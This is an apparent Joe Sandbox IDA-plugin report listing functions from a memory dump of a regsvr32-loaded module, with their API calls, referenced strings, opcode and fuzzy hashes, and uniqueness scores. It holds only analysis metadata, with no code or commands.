Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ByteCharMultiWide
String ID: 890367f6564d5d34cd008765d87fa7b5b98cdb1f7904696d90a06637df9007823e0f5d98fa86e8ed102097c62e61f673caf8af690f731e1ae7d21135de9672f14f
API String ID: 469901203-4124513118
Opcode ID: b506b30d9deed56fd26a2eb93feb2d1d91e1310002705e1b3193b8cbb5916c20
Instruction ID: 6f0b1d7337d69ada6ad1b70aaa95cde2bbd545456462216ca74dccefd0beb0fe
Opcode Fuzzy Hash: b506b30d9deed56fd26a2eb93feb2d1d91e1310002705e1b3193b8cbb5916c20
Instruction Fuzzy Hash: E351E7A2B1568198EB00DFF5D0447AC2761FB05B98F848139EE1EABBD9DE7CE149C300

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D98790, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161UNIQUE

Download Yara Rule

APIs

Part of subcall function 00007FF983DAB580: WideCharToMultiByte.KERNEL32 ref: 00007FF983DAB5F8
Part of subcall function 00007FF983DAB580: WideCharToMultiByte.KERNEL32 ref: 00007FF983DAB6AF

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D989B4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D989BA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D989C0

Strings

1517069f017ffb28667302e58ad77fca2505339eafe02b33652665b40ee9a65c7c596ac6f3bd756f397a489923c48b71547244ebda945f47172016c67491df2106, xrefs: 00007FF983D987DD

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ByteCharMultiWide
String ID: 1517069f017ffb28667302e58ad77fca2505339eafe02b33652665b40ee9a65c7c596ac6f3bd756f397a489923c48b71547244ebda945f47172016c67491df2106
API String ID: 469901203-501322296
Opcode ID: a3ca9fbf11681a267bfd6786acdfa842ba53b32208013c012f2ada84cfde4e1a
Instruction ID: 2d94da7aee74a099d830af6bcdccb83df2ae4844ac60a67a4599c80bc4a7b81d
Opcode Fuzzy Hash: a3ca9fbf11681a267bfd6786acdfa842ba53b32208013c012f2ada84cfde4e1a
Instruction Fuzzy Hash: 7D51C8E2B1568198EB00DFB5D0447AC2761FB45B98F848139EE5DA7BD9DE7CE149C300

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DBEC3C, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 154COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF983DBEC76
_invalid_parameter_noinfo.LIBCMT ref: 00007FF983DBEE4B

Strings

*, xrefs: 00007FF983DBED74
, xrefs: 00007FF983DBEDC9

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID: $*
API String ID: 3215553584-3982473090
Opcode ID: c5ba4a7307209a58e5633475c8d9a203ba91463100d76d49df4e6dc230a4d0e5
Instruction ID: 3866bc955548020f88fbb3a636cc6a6302c1d858b0509332616bfa2c6043d89f
Opcode Fuzzy Hash: c5ba4a7307209a58e5633475c8d9a203ba91463100d76d49df4e6dc230a4d0e5
Instruction Fuzzy Hash: 5361A7B290C25286E768CF68A05467C3BA5FB05B44F9C113DD64BAB299DFECF449C740

Uniqueness

Uniqueness Score: 0.98%

Function 00007FF983D912DB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 109UNIQUE

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32 ref: 00007FF983D912FD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9148A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D91490

Strings

d4738a02b928335e7de46b0526c11f9183997d5a878197adfe3f304d5da8, xrefs: 00007FF983D9131D

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$InfoNativeSystem
String ID: d4738a02b928335e7de46b0526c11f9183997d5a878197adfe3f304d5da8
API String ID: 836507568-2598894011
Opcode ID: cb4f9efdb94993f52e66ea779711eb4b800018054d1b475db54c6e0402241d7d
Instruction ID: 26bc366472c344c149c7132db06e319430e78a7852a0f99869045700f266b41b
Opcode Fuzzy Hash: cb4f9efdb94993f52e66ea779711eb4b800018054d1b475db54c6e0402241d7d
Instruction Fuzzy Hash: 0F4198A2B1878181EA10DB68E48476D6361FB857E0F945239EA9D57BE9DFBCF084C700

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D91E70, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 98timeUNIQUE

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00007FF983D91EAB

Strings

3045443075ddbbdebebb3d93ee53ffaa15345d480de23dce55ded12697e12eb6e28aebebac158378f67f26985330fc32, xrefs: 00007FF983D91EDB

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: 3045443075ddbbdebebb3d93ee53ffaa15345d480de23dce55ded12697e12eb6e28aebebac158378f67f26985330fc32
API String ID: 481472006-537308821
Opcode ID: a9826593b9e87ded50ee66cd7cf85ffefca9b60050b2ed3906b2b0f5418a62bf
Instruction ID: dfddf2e5b6ae40ae09c13aba1c172f055f5f6949250c1d97bdf8eecac2fc4deb
Opcode Fuzzy Hash: a9826593b9e87ded50ee66cd7cf85ffefca9b60050b2ed3906b2b0f5418a62bf
Instruction Fuzzy Hash: 0941BF72A1878185E700CFA1E4407AE73B5F784794F804229EE8DA7A98DFBCE154CB80

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DDC0E0, Relevance: 6.2, APIs: 4, Instructions: 159COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF983DDC121
_invalid_parameter_noinfo.LIBCMT ref: 00007FF983DDC1A1
_invalid_parameter_noinfo.LIBCMT ref: 00007FF983DDC1F5
_get_daylight.LIBCMT ref: 00007FF983DDC24D

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo$_get_daylight
String ID:
API String ID: 72036449-0
Opcode ID: 6dd91ec7018cd3d03dd38f34976e1d3839a928ce2cc03b79f6f8a5dee0fa9b4c
Instruction ID: e862ccf5119d4b235a9b86f36677157e7588b92a3fc6b528c952be10a314ff23
Opcode Fuzzy Hash: 6dd91ec7018cd3d03dd38f34976e1d3839a928ce2cc03b79f6f8a5dee0fa9b4c
Instruction Fuzzy Hash: 5C51C0B2D0821287F768C9E89401B797A50BB41794F9D403DDA0FE72E6CAACF94AD641

Uniqueness

Uniqueness Score: 1.44%

Function 00007FF983DA6E40, Relevance: 6.1, APIs: 4, Instructions: 113UNIQUE

Download Yara Rule

APIs

IsBadCodePtr.KERNEL32 ref: 00007FF983DA6E7E
IsBadCodePtr.KERNEL32 ref: 00007FF983DA6F74
SetLastError.KERNEL32 ref: 00007FF983DA6F96
SetLastError.KERNEL32 ref: 00007FF983DA6FB4

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: CodeErrorLast
String ID:
API String ID: 850174997-0
Opcode ID: d97a25a01474b72a61f8f311287919af70fd99a873e25c07a582ba64e3cc96a4
Instruction ID: 4ba6755a71972962ea9d7b826a5c17896d101aef67896b2530dc7a6b3b1ed50a
Opcode Fuzzy Hash: d97a25a01474b72a61f8f311287919af70fd99a873e25c07a582ba64e3cc96a4
Instruction Fuzzy Hash: EF415AB2A15642C6EB14CF51D504B3963A8FB48F98F494439DE5E97788EF7CE848C300

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DD3874, Relevance: 6.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32 ref: 00007FF983DD38C2
GetLastError.KERNEL32 ref: 00007FF983DD38CC
SetFilePointerEx.KERNEL32 ref: 00007FF983DD38F0
SetFilePointerEx.KERNEL32 ref: 00007FF983DD3915

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: FilePointer$ErrorLast
String ID:
API String ID: 142388799-0
Opcode ID: 51c5d0b0d340aa6278112220f9dd4920b96edda5edc0a1a51ae440398d5ccfb2
Instruction ID: 4153e7f9036cf64150d988fc85c0e57e3af725976651beb781147a057abc81e7
Opcode Fuzzy Hash: 51c5d0b0d340aa6278112220f9dd4920b96edda5edc0a1a51ae440398d5ccfb2
Instruction Fuzzy Hash: 452189A2A1864281EB20DB65A840B797761BB44BA0FDC0335D56FE77D4CEBCF449C700

Uniqueness

Uniqueness Score: 0.24%

Function 00007FF983DB9E9C, Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF983DB9EC8
GetCurrentThreadId.KERNEL32 ref: 00007FF983DB9ED6
GetCurrentProcessId.KERNEL32 ref: 00007FF983DB9EE2
QueryPerformanceCounter.KERNEL32 ref: 00007FF983DB9EF2

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 537f7fe44056394cfc0ecc6bbd4777fa352585b1e7579073a78de3d85b9564f2
Instruction ID: 1bf0a0deb85c8148b19ff44d65850950c1ff6b7216d7be70f3cff29098e5b113
Opcode Fuzzy Hash: 537f7fe44056394cfc0ecc6bbd4777fa352585b1e7579073a78de3d85b9564f2
Instruction Fuzzy Hash: 8E115162A04F418AEF10CF60E8547B433A4FB1D758F891A35EA5D86794DF7CE1A8C740

Uniqueness

Uniqueness Score: 0.05%

Function 00007FF983D92580, Relevance: 6.0, APIs: 4, Instructions: 35COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF983D9259C
OpenProcessToken.ADVAPI32 ref: 00007FF983D925AD
GetTokenInformation.ADVAPI32 ref: 00007FF983D925DA
CloseHandle.KERNEL32 ref: 00007FF983D925F1

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: ProcessToken$CloseCurrentHandleInformationOpen
String ID:
API String ID: 215268677-0
Opcode ID: 0019742395aee970d180fa3dd4f0a02abbafaf5f1e0ba7b51a21258ee040976e
Instruction ID: 4f39c72d79b927dbbd6a1f34b89a2ecc5a22813daf20283bf82e41ab698e0fd7
Opcode Fuzzy Hash: 0019742395aee970d180fa3dd4f0a02abbafaf5f1e0ba7b51a21258ee040976e
Instruction Fuzzy Hash: B90144B1619681D7EB40DF60E494BAAB3B0FB84B44F845139EA4F97624DF7CE448CB50

Uniqueness

Uniqueness Score: 0.11%

Function 00007FF983DBCA5C, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163UNIQUELIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF983DBCA86

Strings

csm, xrefs: 00007FF983DBCAAB
csm, xrefs: 00007FF983DBCC1A

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: __except_validate_context_record
String ID: csm$csm
API String ID: 1467352782-3733052814
Opcode ID: 36ffa24156ef67850ce43c3d3424e815371ab658b65586de8c56cd910bd32f05
Instruction ID: 2af072a631b8a8fe758558ab1ea92e8a6e68a9ba4cb3e5c73abda6c78ec21ea2
Opcode Fuzzy Hash: 36ffa24156ef67850ce43c3d3424e815371ab658b65586de8c56cd910bd32f05
Instruction Fuzzy Hash: E071C5B250868286D760CF659040B7E7BA4FB50F85F888539EE4EAB785CE6CF496C740

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DD26F0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF983DD2733

Strings

e+000, xrefs: 00007FF983DD27D8
gfff, xrefs: 00007FF983DD2855

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID: e+000$gfff
API String ID: 3215553584-3030954782
Opcode ID: 10a3ef1d052316caaaaee41695669b900b3bcf0be50960d7c2ffc76df5b4546d
Instruction ID: 03373e7bbd68ab0fb8e9d108a5ba869fa5da63ee48fdc8f02b93dd1d32a18d6c
Opcode Fuzzy Hash: 10a3ef1d052316caaaaee41695669b900b3bcf0be50960d7c2ffc76df5b4546d
Instruction Fuzzy Hash: 4B5138A2B186C186E724CF7598417697B91FB80B90F8C9239C79D9BBD5CE6CF449C700

Uniqueness

Uniqueness Score: 1.11%

Function 00007FF983DBCEA0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117UNIQUE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF983DBCF4A
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FF983DBCF76

Strings

csm, xrefs: 00007FF983DBD076

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: cbc02f6a5409519197e0c9820c9d2aef08f34b01e81d4bcd91a01df55d9b73bc
Instruction ID: 0c7dd6ab7988b5cc77d134dbec48929201a4fdb6d100820b5d8c0d079827aa1c
Opcode Fuzzy Hash: cbc02f6a5409519197e0c9820c9d2aef08f34b01e81d4bcd91a01df55d9b73bc
Instruction Fuzzy Hash: 8B5130B2A1978186D620EF55A04076D77B4FB88B90F980139DF8E5BB55CFBCE465CB00

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DD4FDC, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileUNIQUE

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF983DD50F3
GetLastError.KERNEL32 ref: 00007FF983DD5115

Strings

U, xrefs: 00007FF983DD509F

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 4271a1a9dcc19ead190744ce0c02dd34a15e22fdd4a0ed7a1329f3d56b9864eb
Instruction ID: 625b1919c8c8b85dd977dc31ad323373240f1b5c1678cf4fef3eab81f86b49a9
Opcode Fuzzy Hash: 4271a1a9dcc19ead190744ce0c02dd34a15e22fdd4a0ed7a1329f3d56b9864eb
Instruction Fuzzy Hash: 5141C562B19A4182DB20CF65E444BB97761FB98784F894039EE4ED7794DFBCE409CB40

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DD7B44, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON

Download Yara Rule

APIs

_handle_errorf.LIBCMT ref: 00007FF983DD7CB6

Strings

", xrefs: 00007FF983DD7C61
powf, xrefs: 00007FF983DD7CAF

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _handle_errorf
String ID: "$powf
API String ID: 2315412904-603753351
Opcode ID: 652a7e7705ab8cec3a43a6861bd90ae7b267cf4f23eb1fdb4e23173311a5305a
Instruction ID: e33b8137b192d64fc626f9aba4fdc627cfa7f7c0c5a5d82846b260938579d277
Opcode Fuzzy Hash: 652a7e7705ab8cec3a43a6861bd90ae7b267cf4f23eb1fdb4e23173311a5305a
Instruction Fuzzy Hash: 1E4162B3D28680DFD370CF66E480BAAB6A0F799348F141329F74A56998CBBDD554DB00

Uniqueness

Uniqueness Score: 3.53%

Function 00007FF983D98440, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76UNIQUE

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D9853F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D98545

Strings

>> , xrefs: 00007FF983D98446

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: >>
API String ID: 3668304517-2870946365
Opcode ID: cde5cdb6593ad0a329061dbbeaa412a580a08610cf0e8eeff6053d63afc9cbdc
Instruction ID: 6ef4068d7b6f800ba7a967b1f6b180a2b465a989349564d9a3538a4d9bd2158e
Opcode Fuzzy Hash: cde5cdb6593ad0a329061dbbeaa412a580a08610cf0e8eeff6053d63afc9cbdc
Instruction Fuzzy Hash: BE217FE2A0468181EA04DF65E58876D33A2FB44FC8FD88039DB4E57659DFBCE4A8C344

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DD7A20, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

_handle_error.LIBCMT ref: 00007FF983DD7B32

Strings

pow, xrefs: 00007FF983DD7B21
", xrefs: 00007FF983DD7B0B

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _handle_error
String ID: "$pow
API String ID: 1757819995-713443511
Opcode ID: 27aa9e4456571abb7611841da671f5bdd742cb657259e18622e4dde5688f2da9
Instruction ID: fd7269c1857e7dc223428a02533067f773078ad76db6ada027ee93fa42c616c4
Opcode Fuzzy Hash: 27aa9e4456571abb7611841da671f5bdd742cb657259e18622e4dde5688f2da9
Instruction Fuzzy Hash: 063172B2D1CA8587D760CF50E040B6BBAA0FBDA344F141329F68A5A954DBFDE185DF00

Uniqueness

Uniqueness Score: 1.47%

Function 00007FF983DD6408, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF983DD6441
CompareStringW.KERNEL32 ref: 00007FF983DD64C9

Strings

CompareStringEx, xrefs: 00007FF983DD6435

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: CompareStringtry_get_function
String ID: CompareStringEx
API String ID: 3328479835-2590796910
Opcode ID: 8b8cec4aaa48750e5595f163a3ee38e18226a02e0d79436543ba82fe73597251
Instruction ID: ef2906417250c99f2a59c88abb8bf0a763cc52c5af9543cb98a202d146a5c891
Opcode Fuzzy Hash: 8b8cec4aaa48750e5595f163a3ee38e18226a02e0d79436543ba82fe73597251
Instruction Fuzzy Hash: 5A112175608B8186D760CB55B4407AAB7A0FB89790F584139EECE93B19DF7CE544CB40

Uniqueness

Uniqueness Score: 5.06%

Function 00007FF983DD6674, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF983DD66AD
LCMapStringW.KERNEL32 ref: 00007FF983DD6735

Strings

LCMapStringEx, xrefs: 00007FF983DD66A1

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
